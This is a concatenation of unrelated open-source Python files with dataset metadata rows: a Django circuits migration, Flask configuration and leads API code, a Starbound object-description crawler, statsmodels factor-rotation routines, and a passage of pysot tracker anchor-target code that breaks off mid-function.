replaces = [('circuits', '0001_initial'), ('circuits', '0002_auto_20160622_1821'), ('circuits', '0003_provider_32bit_asn_support'), ('circuits', '0004_circuit_add_tenant'), ('circuits', '0005_circuit_add_upstream_speed'), ('circuits', '0006_terminations'), ('circuits', '0007_circuit_add_description'), ('circuits', '0008_circuittermination_interface_protect_on_delete'), ('circuits', '0009_unicode_literals'), ('circuits', '0010_circuit_status')]
dependencies = [
('dcim', '0001_initial'),
('dcim', '0022_color_names_to_rgb'),
('tenancy', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Provider',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('name', models.CharField(max_length=50, unique=True)),
('slug', models.SlugField(unique=True)),
('asn', dcim.fields.ASNField(blank=True, null=True, verbose_name='ASN')),
('account', models.CharField(blank=True, max_length=30, verbose_name='Account number')),
('portal_url', models.URLField(blank=True, verbose_name='Portal')),
('noc_contact', models.TextField(blank=True, verbose_name='NOC contact')),
('admin_contact', models.TextField(blank=True, verbose_name='Admin contact')),
('comments', models.TextField(blank=True)),
],
options={
'ordering': ['name'],
},
),
migrations.CreateModel(
name='CircuitType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, unique=True)),
('slug', models.SlugField(unique=True)),
],
options={
'ordering': ['name'],
},
),
migrations.CreateModel(
name='Circuit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('cid', models.CharField(max_length=50, verbose_name='Circuit ID')),
('install_date', models.DateField(blank=True, null=True, verbose_name='Date installed')),
('commit_rate', models.PositiveIntegerField(blank=True, null=True, verbose_name='Commit rate (Kbps)')),
('comments', models.TextField(blank=True)),
('provider', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='circuits', to='circuits.Provider')),
('type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='circuits', to='circuits.CircuitType')),
('tenant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='circuits', to='tenancy.Tenant')),
('description', models.CharField(blank=True, max_length=100)),
('status', models.PositiveSmallIntegerField(choices=[[2, 'Planned'], [3, 'Provisioning'], [1, 'Active'], [4, 'Offline'], [0, 'Deprovisioning'], [5, 'Decommissioned']], default=1))
],
options={
'ordering': ['provider', 'cid'],
},
),
migrations.AlterUniqueTogether(
name='circuit',
unique_together=set([('provider', 'cid')]),
),
migrations.CreateModel(
name='CircuitTermination',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('term_side', models.CharField(choices=[('A', 'A'), ('Z', 'Z')], max_length=1, verbose_name='Termination')),
('port_speed', models.PositiveIntegerField(verbose_name='Port speed (Kbps)')),
('upstream_speed', models.PositiveIntegerField(blank=True, help_text='Upstream speed, if different from port speed', null=True, verbose_name='Upstream speed (Kbps)')),
('xconnect_id', models.CharField(blank=True, max_length=50, verbose_name='Cross-connect ID')),
('pp_info', models.CharField(blank=True, max_length=100, verbose_name='Patch panel/port(s)')),
('circuit', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='terminations', to='circuits.Circuit')),
('interface', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='circuit_termination', to='dcim.Interface')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='circuit_terminations', to='dcim.Site')),
],
options={
'ordering': ['circuit', 'term_side'],
},
),
migrations.AlterUniqueTogether(
name='circuittermination',
unique_together=set([('circuit', 'term_side')]),
),
]
| 58.831579
| 451
| 0.604044
|
7668abd0213c180f9c98071efbc9347d68617826
| 124
|
py
|
Python
|
src/gamenight/app/config/default.py
|
justanr/gamenight
|
968dad4b60179c6a2dbdc5006835eda7dc17640d
|
[
"MIT"
] | 3
|
2018-04-24T07:54:48.000Z
|
2021-05-15T02:55:11.000Z
|
src/gamenight/app/config/default.py
|
justanr/gamenight
|
968dad4b60179c6a2dbdc5006835eda7dc17640d
|
[
"MIT"
] | 11
|
2018-04-25T02:30:00.000Z
|
2018-05-08T01:03:33.000Z
|
src/gamenight/app/config/default.py
|
justanr/gamenight
|
968dad4b60179c6a2dbdc5006835eda7dc17640d
|
[
"MIT"
] | null | null | null |
class DefaultGameNightConfig:
SQLALCHEMY_DATABASE_URI = 'sqlite:///games.db'
SQLALCHEMY_TRACK_MODIFICATIONS = False
| 31
| 50
| 0.790323
|
788755fd74d7526c6b1e2b7a97185ea059167470
| 2,341
|
py
|
Python
|
src/crawler-retriever.py
|
GTG3000/StarboundDescriptionPatcher-Compiler
|
44e9b1621a4372ba185f1ffbdd6687e931f44fda
|
[
"Apache-2.0"
] | 1
|
2016-10-27T04:22:20.000Z
|
2016-10-27T04:22:20.000Z
|
src/crawler-retriever.py
|
GTG3000/StarboundDescriptionPatcher-Compiler
|
44e9b1621a4372ba185f1ffbdd6687e931f44fda
|
[
"Apache-2.0"
] | null | null | null |
src/crawler-retriever.py
|
GTG3000/StarboundDescriptionPatcher-Compiler
|
44e9b1621a4372ba185f1ffbdd6687e931f44fda
|
[
"Apache-2.0"
] | null | null | null |
import os
import json
import re
def removecomments(s):
inCommentSingle = False
inCommentMulti = False
inString = False
t = []
l = len(s)
i = 0
fromIndex = 0
while i < l:
c = s[i]
if not inCommentMulti and not inCommentSingle:
if c == '"':
slashes = 0
for j in range(i - 1, 0, -1):
if s[j] != '\\':
break
slashes += 1
if slashes % 2 == 0:
inString = not inString
elif not inString:
if c == '#':
inCommentSingle = True
t.append(s[fromIndex:i])
elif c == '/' and i + 1 < l:
cn = s[i + 1]
if cn == '/':
inCommentSingle = True
t.append(s[fromIndex:i])
i += 1
elif cn == '*':
inCommentMulti = True
t.append(s[fromIndex:i])
i += 1
elif inCommentSingle and (c == '\n' or c == '\r'):
inCommentSingle = False
fromIndex = i
elif inCommentMulti and c == '*' and i + 1 < l and s[i + 1] == '/':
inCommentMulti = False
i += 1
fromIndex = i + 1
i += 1
if not inCommentSingle and not inCommentMulti:
t.append(s[fromIndex:len(s)])
return "".join(t)
common_prefix = os.getcwd()+'\\'
p_list = []
for path, dirs, files in os.walk(os.getcwd()):
for file in files :
if '.object' in file:
t_file = open(os.path.join(path,file))
t_string = t_file.read()
t_json = json.loads(removecomments(t_string))
if 'description' in t_json:
t_desc = t_json['description']
else:
t_desc = "__no description__"
p_list.append(dict(path = os.path.relpath(path,common_prefix),file = file, name = t_json['shortdescription'], desc = t_desc))
t_file.close()
t_file = open(os.path.join(common_prefix,'namedump.json'),'w')
json.dump(p_list,t_file,indent = 2, sort_keys = True)
t_file.close()
| 27.869048
| 138
| 0.442546
|
667819357e155c51c422b1eb0fb2798563256a7b
| 1,643
|
py
|
Python
|
app/views/leads_view.py
|
dio-silvestre/ComunicaDev-Flask-Restful
|
c2a4c84f47305af13bbe60df588b1bca0eacb22f
|
[
"MIT"
] | null | null | null |
app/views/leads_view.py
|
dio-silvestre/ComunicaDev-Flask-Restful
|
c2a4c84f47305af13bbe60df588b1bca0eacb22f
|
[
"MIT"
] | null | null | null |
app/views/leads_view.py
|
dio-silvestre/ComunicaDev-Flask-Restful
|
c2a4c84f47305af13bbe60df588b1bca0eacb22f
|
[
"MIT"
] | null | null | null |
from http import HTTPStatus
from app.exc import DataAlreadyRegistered, DataNotFound, InvalidEmailError
from flask_restful import Resource
from flask import make_response
from flask_jwt_extended import jwt_required
from app.services.leads_service import LeadService
from app.configs.decorators import verify_role_admin
class LeadResource(Resource):
@jwt_required()
@verify_role_admin
def get(self):
return make_response(LeadService.get_all())
def post(self):
try:
return make_response(LeadService.create())
except InvalidEmailError as e:
return {'error': e.message}, HTTPStatus.BAD_REQUEST
except DataAlreadyRegistered as e:
return {'error': e.message}, HTTPStatus.CONFLICT
class LeadRetrieveResource(Resource):
@jwt_required()
@verify_role_admin
def get(self, lead_id):
try:
return make_response(LeadService.get_by_id(lead_id))
except DataNotFound as e:
return e.message, HTTPStatus.NOT_FOUND
@jwt_required()
@verify_role_admin
def patch(self, lead_id):
try:
return make_response(LeadService.update(lead_id))
except DataNotFound as e:
return e.message, HTTPStatus.NOT_FOUND
def delete(self, lead_id):
try:
return make_response(LeadService.delete(lead_id))
except DataNotFound as e:
return e.message, HTTPStatus.NOT_FOUND
class LeadSendEmailResource(Resource):
@jwt_required()
@verify_role_admin
def post(self):
return make_response(LeadService.newsletter_info())
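# Hedged sketch (not from this project): how these resources are typically
# registered with a flask_restful Api; the URL paths below are assumptions.
#
#   api.add_resource(LeadResource, "/leads")
#   api.add_resource(LeadRetrieveResource, "/leads/<int:lead_id>")
#   api.add_resource(LeadSendEmailResource, "/leads/newsletter")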
| 26.934426
| 74
| 0.690201
|
a476fe484deaa623b0f99d63403e69756464eaa4
| 18,658
|
py
|
Python
|
statsmodels/multivariate/factor_rotation/_gpa_rotation.py
|
luxiform/statsmodels
|
916856b3ae555ead658daec31fb5130f1bbf77d5
|
[
"BSD-3-Clause"
] | 1
|
2019-12-16T10:12:31.000Z
|
2019-12-16T10:12:31.000Z
|
statsmodels/multivariate/factor_rotation/_gpa_rotation.py
|
sscswapnil/statsmodels
|
89fa4e3b685d160f94c4d99e655029c519115b17
|
[
"BSD-3-Clause"
] | null | null | null |
statsmodels/multivariate/factor_rotation/_gpa_rotation.py
|
sscswapnil/statsmodels
|
89fa4e3b685d160f94c4d99e655029c519115b17
|
[
"BSD-3-Clause"
] | 1
|
2022-01-31T11:43:28.000Z
|
2022-01-31T11:43:28.000Z
|
# -*- coding: utf-8 -*-
"""
This file contains a Python version of the gradient projection rotation
algorithms (GPA) developed by Bernaards, C.A. and Jennrich, R.I.
The code is based on code developed by Bernaards, C.A. and Jennrich, R.I.
and is ported and made available with permission of the authors.
References
----------
[1] Bernaards, C.A. and Jennrich, R.I. (2005) Gradient Projection Algorithms
and Software for Arbitrary Rotation Criteria in Factor Analysis. Educational
and Psychological Measurement, 65 (5), 676-696.
[2] Jennrich, R.I. (2001). A simple general procedure for orthogonal rotation.
Psychometrika, 66, 289-306.
[3] Jennrich, R.I. (2002). A simple general method for oblique rotation.
Psychometrika, 67, 7-19.
[4] http://www.stat.ucla.edu/research/gpa/matlab.net
[5] http://www.stat.ucla.edu/research/gpa/GPderfree.txt
"""
import numpy as np
def GPA(A, ff=None, vgQ=None, T=None, max_tries=501,
rotation_method='orthogonal', tol=1e-5):
r"""
The gradient projection algorithm (GPA) minimizes a target function
:math:`\phi(L)`, where :math:`L` is a matrix with rotated factors.
For orthogonal rotation methods :math:`L=AT`, where :math:`T` is an
orthogonal matrix. For oblique rotation matrices :math:`L=A(T^*)^{-1}`,
where :math:`T` is a normal matrix, i.e., :math:`TT^*=T^*T`. Oblique
rotations relax the orthogonality constraint in order to gain simplicity
in the interpretation.
Parameters
----------
A : numpy matrix
non rotated factors
T : numpy matrix (default identity matrix)
initial guess of rotation matrix
    ff : function (default None)
criterion :math:`\phi` to optimize. Should have A, T, L as keyword
arguments
and mapping to a float. Only used (and required) if vgQ is not
provided.
    vgQ : function (default None)
criterion :math:`\phi` to optimize and its derivative. Should have
A, T, L as keyword arguments and mapping to a tuple containing a
float and vector. Can be omitted if ff is provided.
max_tries : int (default 501)
maximum number of iterations
rotation_method : str
should be one of {orthogonal, oblique}
tol : float
stop criterion, algorithm stops if Frobenius norm of gradient is
        smaller than tol
"""
# pre processing
if rotation_method not in ['orthogonal', 'oblique']:
raise ValueError('rotation_method should be one of '
'{orthogonal, oblique}')
if vgQ is None:
if ff is None:
raise ValueError('ff should be provided if vgQ is not')
derivative_free = True
Gff = lambda x: Gf(x, lambda y: ff(T=y, A=A, L=None))
else:
derivative_free = False
if T is None:
T = np.eye(A.shape[1])
# pre processing for iteration
al = 1
table = []
# pre processing for iteration: initialize f and G
if derivative_free:
f = ff(T=T, A=A, L=None)
G = Gff(T)
elif rotation_method == 'orthogonal': # and not derivative_free
L = A.dot(T)
f, Gq = vgQ(L=L)
G = (A.T).dot(Gq)
else: # i.e. rotation_method == 'oblique' and not derivative_free
Ti = np.linalg.inv(T)
L = A.dot(Ti.T)
f, Gq = vgQ(L=L)
G = -((L.T).dot(Gq).dot(Ti)).T
# iteration
for i_try in range(0, max_tries):
# determine Gp
if rotation_method == 'orthogonal':
M = (T.T).dot(G)
S = (M + M.T)/2
Gp = G - T.dot(S)
else: # i.e. if rotation_method == 'oblique':
Gp = G-T.dot(np.diag(np.sum(T*G, axis=0)))
s = np.linalg.norm(Gp, 'fro')
table.append([i_try, f, np.log10(s), al])
# if we are close stop
if s < tol:
break
# update T
al = 2*al
for i in range(11):
# determine Tt
X = T - al*Gp
if rotation_method == 'orthogonal':
U, D, V = np.linalg.svd(X, full_matrices=False)
Tt = U.dot(V)
else: # i.e. if rotation_method == 'oblique':
v = 1/np.sqrt(np.sum(X**2, axis=0))
Tt = X.dot(np.diag(v))
# calculate objective using Tt
if derivative_free:
ft = ff(T=Tt, A=A, L=None)
elif rotation_method == 'orthogonal': # and not derivative_free
L = A.dot(Tt)
ft, Gq = vgQ(L=L)
else: # i.e. rotation_method == 'oblique' and not derivative_free
Ti = np.linalg.inv(Tt)
L = A.dot(Ti.T)
ft, Gq = vgQ(L=L)
# if sufficient improvement in objective -> use this T
if ft < f-.5*s**2*al:
break
al = al/2
# post processing for next iteration
T = Tt
f = ft
if derivative_free:
G = Gff(T)
elif rotation_method == 'orthogonal': # and not derivative_free
G = (A.T).dot(Gq)
else: # i.e. rotation_method == 'oblique' and not derivative_free
G = -((L.T).dot(Gq).dot(Ti)).T
# post processing
Th = T
Lh = rotateA(A, T, rotation_method=rotation_method)
Phi = (T.T).dot(T)
return Lh, Phi, Th, table
def Gf(T, ff):
"""
Subroutine for the gradient of f using numerical derivatives.
"""
k = T.shape[0]
ep = 1e-4
G = np.zeros((k, k))
for r in range(k):
for s in range(k):
dT = np.zeros((k, k))
dT[r, s] = ep
G[r, s] = (ff(T+dT)-ff(T-dT))/(2*ep)
return G
def rotateA(A, T, rotation_method='orthogonal'):
r"""
For orthogonal rotation methods :math:`L=AT`, where :math:`T` is an
orthogonal matrix. For oblique rotation matrices :math:`L=A(T^*)^{-1}`,
where :math:`T` is a normal matrix, i.e., :math:`TT^*=T^*T`. Oblique
rotations relax the orthogonality constraint in order to gain simplicity
in the interpretation.
"""
if rotation_method == 'orthogonal':
L = A.dot(T)
elif rotation_method == 'oblique':
L = A.dot(np.linalg.inv(T.T))
    else:  # invalid rotation_method
        raise ValueError('rotation_method should be one of '
                         '{orthogonal, oblique}')
return L
def oblimin_objective(L=None, A=None, T=None, gamma=0,
rotation_method='orthogonal',
return_gradient=True):
r"""
Objective function for the oblimin family for orthogonal or
    oblique rotation which minimizes:
.. math::
\phi(L) = \frac{1}{4}(L\circ L,(I-\gamma C)(L\circ L)N),
where :math:`L` is a :math:`p\times k` matrix, :math:`N` is
:math:`k\times k`
matrix with zeros on the diagonal and ones elsewhere, :math:`C` is a
:math:`p\times p` matrix with elements equal to :math:`1/p`,
:math:`(X,Y)=\operatorname{Tr}(X^*Y)` is the Frobenius norm and
:math:`\circ`
is the element-wise product or Hadamard product.
The gradient is given by
.. math::
L\circ\left[(I-\gamma C) (L \circ L)N\right].
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix. For oblique rotations :math:`L`
satisfies
.. math::
L = A(T^*)^{-1},
where :math:`T` is a normal matrix.
The oblimin family is parameterized by the parameter :math:`\gamma`. For
orthogonal rotations:
* :math:`\gamma=0` corresponds to quartimax,
* :math:`\gamma=\frac{1}{2}` corresponds to biquartimax,
* :math:`\gamma=1` corresponds to varimax,
* :math:`\gamma=\frac{1}{p}` corresponds to equamax.
    For oblique rotations:
* :math:`\gamma=0` corresponds to quartimin,
* :math:`\gamma=\frac{1}{2}` corresponds to biquartimin.
Parameters
----------
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
gamma : float (default 0)
a parameter
rotation_method : str
should be one of {orthogonal, oblique}
return_gradient : bool (default True)
toggles return of gradient
"""
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method=rotation_method)
p, k = L.shape
L2 = L**2
N = np.ones((k, k))-np.eye(k)
if np.isclose(gamma, 0):
X = L2.dot(N)
else:
C = np.ones((p, p))/p
X = (np.eye(p) - gamma*C).dot(L2).dot(N)
phi = np.sum(L2*X)/4
if return_gradient:
Gphi = L*X
return phi, Gphi
else:
return phi
def orthomax_objective(L=None, A=None, T=None, gamma=0, return_gradient=True):
r"""
Objective function for the orthomax family for orthogonal
    rotation which minimizes the following objective:
.. math::
\phi(L) = -\frac{1}{4}(L\circ L,(I-\gamma C)(L\circ L)),
where :math:`0\leq\gamma\leq1`, :math:`L` is a :math:`p\times k` matrix,
:math:`C` is a :math:`p\times p` matrix with elements equal to
:math:`1/p`,
:math:`(X,Y)=\operatorname{Tr}(X^*Y)` is the Frobenius norm and
:math:`\circ` is the element-wise product or Hadamard product.
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix.
The orthomax family is parameterized by the parameter :math:`\gamma`:
* :math:`\gamma=0` corresponds to quartimax,
* :math:`\gamma=\frac{1}{2}` corresponds to biquartimax,
* :math:`\gamma=1` corresponds to varimax,
* :math:`\gamma=\frac{1}{p}` corresponds to equamax.
Parameters
----------
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
gamma : float (default 0)
a parameter
return_gradient : bool (default True)
toggles return of gradient
"""
assert 0 <= gamma <= 1, "Gamma should be between 0 and 1"
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method='orthogonal')
p, k = L.shape
L2 = L**2
if np.isclose(gamma, 0):
X = L2
else:
C = np.ones((p, p))/p
X = (np.eye(p)-gamma*C).dot(L2)
phi = -np.sum(L2*X)/4
if return_gradient:
Gphi = -L*X
return phi, Gphi
else:
return phi
def CF_objective(L=None, A=None, T=None, kappa=0,
rotation_method='orthogonal',
return_gradient=True):
r"""
Objective function for the Crawford-Ferguson family for orthogonal
    and oblique rotation which minimizes the following objective:
.. math::
        \phi(L) =\frac{1-\kappa}{4} (L\circ L,(L\circ L)N)
                 +\frac{\kappa}{4}(L\circ L,M(L\circ L)),
where :math:`0\leq\kappa\leq1`, :math:`L` is a :math:`p\times k` matrix,
:math:`N` is :math:`k\times k` matrix with zeros on the diagonal and ones
elsewhere,
:math:`M` is :math:`p\times p` matrix with zeros on the diagonal and ones
elsewhere
:math:`(X,Y)=\operatorname{Tr}(X^*Y)` is the Frobenius norm and
:math:`\circ` is the element-wise product or Hadamard product.
The gradient is given by
.. math::
        d\phi(L) = (1-\kappa) L\circ\left[(L\circ L)N\right]
                   +\kappa L\circ \left[M(L\circ L)\right].
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix. For oblique rotations :math:`L`
satisfies
.. math::
L = A(T^*)^{-1},
where :math:`T` is a normal matrix.
For orthogonal rotations the oblimin (and orthomax) family of rotations is
equivalent to the Crawford-Ferguson family. To be more precise:
* :math:`\kappa=0` corresponds to quartimax,
    * :math:`\kappa=\frac{1}{p}` corresponds to varimax,
* :math:`\kappa=\frac{k-1}{p+k-2}` corresponds to parsimax,
* :math:`\kappa=1` corresponds to factor parsimony.
Parameters
----------
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
    kappa : float (default 0)
        a parameter
rotation_method : str
should be one of {orthogonal, oblique}
return_gradient : bool (default True)
toggles return of gradient
"""
assert 0 <= kappa <= 1, "Kappa should be between 0 and 1"
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method=rotation_method)
p, k = L.shape
L2 = L**2
X = None
if not np.isclose(kappa, 1):
N = np.ones((k, k)) - np.eye(k)
X = (1 - kappa)*L2.dot(N)
if not np.isclose(kappa, 0):
M = np.ones((p, p)) - np.eye(p)
if X is None:
X = kappa*M.dot(L2)
else:
X += kappa*M.dot(L2)
phi = np.sum(L2 * X) / 4
if return_gradient:
Gphi = L*X
return phi, Gphi
else:
return phi
def vgQ_target(H, L=None, A=None, T=None, rotation_method='orthogonal'):
r"""
Subroutine for the value of vgQ using orthogonal or oblique rotation
towards a target matrix, i.e., we minimize:
.. math::
\phi(L) =\frac{1}{2}\|L-H\|^2
and the gradient is given by
.. math::
d\phi(L)=L-H.
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix. For oblique rotations :math:`L`
satisfies
.. math::
L = A(T^*)^{-1},
where :math:`T` is a normal matrix.
Parameters
----------
H : numpy matrix
target matrix
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
rotation_method : str
should be one of {orthogonal, oblique}
"""
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method=rotation_method)
q = np.linalg.norm(L-H, 'fro')**2
Gq = 2*(L-H)
return q, Gq
def ff_target(H, L=None, A=None, T=None, rotation_method='orthogonal'):
r"""
Subroutine for the value of f using (orthogonal or oblique) rotation
towards a target matrix, i.e., we minimize:
.. math::
\phi(L) =\frac{1}{2}\|L-H\|^2.
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided. For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix. For oblique rotations
:math:`L` satisfies
.. math::
L = A(T^*)^{-1},
where :math:`T` is a normal matrix.
Parameters
----------
H : numpy matrix
target matrix
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
rotation_method : str
should be one of {orthogonal, oblique}
"""
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method=rotation_method)
return np.linalg.norm(L-H, 'fro')**2
def vgQ_partial_target(H, W=None, L=None, A=None, T=None):
r"""
Subroutine for the value of vgQ using orthogonal rotation towards a partial
target matrix, i.e., we minimize:
.. math::
\phi(L) =\frac{1}{2}\|W\circ(L-H)\|^2,
where :math:`\circ` is the element-wise product or Hadamard product and
:math:`W` is a matrix whose entries can only be one or zero. The gradient
is given by
.. math::
d\phi(L)=W\circ(L-H).
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix.
Parameters
----------
H : numpy matrix
target matrix
W : numpy matrix (default matrix with equal weight one for all entries)
matrix with weights, entries can either be one or zero
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
"""
if W is None:
return vgQ_target(H, L=L, A=A, T=T)
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method='orthogonal')
q = np.linalg.norm(W*(L-H), 'fro')**2
Gq = 2*W*(L-H)
return q, Gq
def ff_partial_target(H, W=None, L=None, A=None, T=None):
r"""
    Subroutine for the value of f using orthogonal rotation towards a partial
target matrix, i.e., we minimize:
.. math::
\phi(L) =\frac{1}{2}\|W\circ(L-H)\|^2,
where :math:`\circ` is the element-wise product or Hadamard product and
:math:`W` is a matrix whose entries can only be one or zero. Either
:math:`L` should be provided or :math:`A` and :math:`T` should be provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix.
Parameters
----------
H : numpy matrix
target matrix
W : numpy matrix (default matrix with equal weight one for all entries)
matrix with weights, entries can either be one or zero
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
"""
if W is None:
return ff_target(H, L=L, A=A, T=T)
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method='orthogonal')
q = np.linalg.norm(W*(L-H), 'fro')**2
return q
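# Illustrative sketch, not part of the original module: a minimal varimax rotation of a
# synthetic loading matrix, combining GPA with the oblimin criterion (gamma=1).
if __name__ == "__main__":
    A = np.random.standard_normal((10, 3))
    vgQ = lambda L=None, A=None, T=None: oblimin_objective(
        L=L, A=A, T=T, gamma=1, rotation_method='orthogonal')
    L, phi, T, table = GPA(A, vgQ=vgQ, rotation_method='orthogonal')
    print(L)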
| 31.410774
| 79
| 0.582806
|
fe14cd3e059203ce9b86cc080a843f0643fbc57c
| 133
|
py
|
Python
|
data/gr-boundary-golf.py
|
cheeseywhiz/cheeseywhiz
|
51f6651ddbaeebd14d9ce77776bc4cf3a95511c4
|
[
"MIT"
] | null | null | null |
data/gr-boundary-golf.py
|
cheeseywhiz/cheeseywhiz
|
51f6651ddbaeebd14d9ce77776bc4cf3a95511c4
|
[
"MIT"
] | null | null | null |
data/gr-boundary-golf.py
|
cheeseywhiz/cheeseywhiz
|
51f6651ddbaeebd14d9ce77776bc4cf3a95511c4
|
[
"MIT"
] | null | null | null |
import json,matplotlib.pyplot as p;p.plot(*zip(*json.loads(open('f').read())['features'][0]['geometry']['coordinates'][0]));p.show()
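# Illustrative un-golfed equivalent, not part of the original entry: the one-liner reads
# a GeoJSON file named 'f', takes the outer ring of the first feature and plots its
# coordinate pairs.
#
#   import json
#   import matplotlib.pyplot as plt
#
#   with open('f') as fp:
#       geojson = json.load(fp)
#   ring = geojson['features'][0]['geometry']['coordinates'][0]
#   plt.plot(*zip(*ring))
#   plt.show()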
| 66.5
| 132
| 0.669173
|
aff885221137789a6ffac105f98648f256432613
| 4,223
|
py
|
Python
|
pysot/datasets/anchor_target.py
|
Existever/Pysot
|
41f009904c81422ae71e83aab5655631d5c4b0d8
|
[
"Apache-2.0",
"MIT"
] | 1
|
2020-08-14T14:57:57.000Z
|
2020-08-14T14:57:57.000Z
|
pysot/datasets/anchor_target.py
|
Existever/Pysot
|
41f009904c81422ae71e83aab5655631d5c4b0d8
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
pysot/datasets/anchor_target.py
|
Existever/Pysot
|
41f009904c81422ae71e83aab5655631d5c4b0d8
|
[
"Apache-2.0",
"MIT"
] | 1
|
2019-11-26T11:48:40.000Z
|
2019-11-26T11:48:40.000Z
|
# Copyright (c) SenseTime. All Rights Reserved.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from pysot.core.config import cfg
from pysot.utils.bbox import IoU, corner2center
from pysot.utils.anchor import Anchors
class AnchorTarget:
def __init__(self,):
        # Generate every anchor for a single location from the given ratios and scales;
        # the output has shape [anchor_num, 4] and each anchor is stored as
        # [-w * 0.5, -h * 0.5, w * 0.5, h * 0.5].
self.anchors = Anchors(cfg.ANCHOR.STRIDE, #8
cfg.ANCHOR.RATIOS, # [0.33, 0.5, 1, 2, 3]
cfg.ANCHOR.SCALES)
        # Generate two representations of all anchors: corner coordinates (x1, y1, x2, y2)
        # and center coordinates (cx, cy, w, h), each with shape [4, anchor_num, size, size].
self.anchors.generate_all_anchors(im_c=cfg.TRAIN.SEARCH_SIZE//2,
size=cfg.TRAIN.OUTPUT_SIZE)
def __call__(self, target, size, neg=False):
'''
        :param target: bounding box of the target in the search-region coordinate system
        :param size: size of the output correlation feature map
        :param neg: whether this pair is being trained as a negative sample pair
        :return: per-anchor information on the feature map: cls (1 positive, 0 negative,
            -1 ignore), delta (encoded offsets of the target box relative to each anchor),
            delta_weight (weights of the positive anchors, 0 elsewhere), overlap (IoU
            between the target box and every anchor)
'''
anchor_num = len(cfg.ANCHOR.RATIOS) * len(cfg.ANCHOR.SCALES)
        # anchor labels: -1 ignore, 0 negative, 1 positive
cls = -1 * np.ones((anchor_num, size, size), dtype=np.int64)
delta = np.zeros((4, anchor_num, size, size), dtype=np.float32)
delta_weight = np.zeros((anchor_num, size, size), dtype=np.float32)
        def select(position, keep_num=16):
            # From the positions that satisfy the condition, randomly keep at most keep_num
            # anchors (selection is purely random; ranking by IoU would arguably be better).
num = position[0].shape[0]
if num <= keep_num:
return position, num
slt = np.arange(num)
np.random.shuffle(slt)
slt = slt[:keep_num]
return tuple(p[slt] for p in position), keep_num
tcx, tcy, tw, th = corner2center(target)
        if neg:
            # For a negative pair, every anchor inside the 7x7 region around the target
            # center on the feature map is treated as a negative sample.
# l = size // 2 - 3
# r = size // 2 + 3 + 1
# cls[:, l:r, l:r] = 0
cx = size // 2
cy = size // 2
cx += int(np.ceil((tcx - cfg.TRAIN.SEARCH_SIZE // 2) /
cfg.ANCHOR.STRIDE + 0.5))
cy += int(np.ceil((tcy - cfg.TRAIN.SEARCH_SIZE // 2) /
cfg.ANCHOR.STRIDE + 0.5))
            l = max(0, cx - 3)  # 7x7 region around the target center
r = min(size, cx + 4)
u = max(0, cy - 3)
d = min(size, cy + 4)
cls[:, u:d, l:r] = 0
neg, neg_num = select(np.where(cls == 0), cfg.TRAIN.NEG_NUM)
cls[:] = -1
cls[neg] = 0
